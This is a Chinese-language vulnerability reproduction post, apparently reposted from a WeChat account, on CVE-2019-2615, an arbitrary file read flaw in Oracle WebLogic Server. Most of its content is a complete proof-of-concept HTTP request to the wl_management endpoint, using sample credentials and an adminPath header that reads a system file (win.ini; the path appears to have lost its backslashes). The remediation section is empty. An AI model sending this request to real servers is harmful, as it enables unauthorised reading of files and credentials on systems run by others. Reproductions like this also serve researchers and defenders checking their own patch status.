Oracle WebLogic Server 是一个统一的可扩展平台,专用于开发、部署和运行 Java 应用等适用于本地环境和云环境的企业应用。它提供了一种强健、成熟和可扩展的Java Enterprise Edition (EE) 和 Jakarta EE 实施方式。
漏洞编号:
CVE-2019-2615
影响范围:
Oracle WebLogic Server 10.3.6.0.0
Oracle WebLogic Server 12.1.3.0.0
Oracle WebLogic Server 12.2.1.3.0
复现环境:
Oracle WebLogic Server 10.3.6.0
0X02 漏洞复现
漏洞利用需要账号密码。
POC:
GET /bea_wls_management_internal2/wl_management HTTP/1.1
Host: 192.168.245.134:7001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36(KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: q=0.7,zh-CN;q=0.6
Connection: close
username:weblogic
password:oracle@123
wl_request_type:wl_jsp_refresh_request
adminPath:C:Windowswin.ini
Upgrade-Insecure-Requests: 1
adminPath:文件路径
username:账号
password:密码
0X03 修复建议
0X04
原文始发于微信公众号(皓月的笔记本):【漏洞复现】Weblogic 任意文件读取漏洞(CVE-2019-2615)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论